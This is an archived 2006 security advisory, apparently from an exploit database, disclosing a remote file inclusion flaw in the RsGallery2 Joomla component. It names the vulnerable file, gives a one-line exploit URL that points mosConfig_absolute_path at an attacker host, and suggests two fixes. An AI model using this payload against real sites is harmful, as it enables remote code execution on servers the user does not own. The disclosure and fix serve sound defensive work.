RsGallery2 <= 1.11.2 (rsgallery.html.php) File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RsGallery2 <= 1.11.2 (rsgallery.html.php) File Include Vulnerability
# Published : 2006-06-28
# Author : marriottvn
# Previous Title : GeekLog <= 1.4.0sr3 f(u)ckeditor Remote Code Execution Exploit
# Next Title : BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit

RsGallery2 for Joomla
---------------------------------------------------------------------------

Discovered: marriottvn
Remote : Yes
Level : High

---------------------------------------------------------------------------
Affected software description :

Application : RsGallery2
version : latest version [ 1.11.2 ]
Description: component for joomla
URL: http://rsdev.nl

----------------------------------------------------------------------------

Vulnerable file :

rsgallery2.html.php

----------------------------------------------------------------------------

Exploit:

http://[sitepath]/[joomlapath]/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://[attacker]

----------------------------------------------------------------------------

Fix:

1.Declare variabel $mosConfig_absolute_path

or

2.Add into the top function:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

----------------------------------------------------------------------------

Contact:

Nick: marriottvn
E-mail: i_love_lonely_girl[at]yahoo.com
Web: http://vnsecurity.com

Greetz to: VnRekcah

# www.Syue.com [2006-06-28]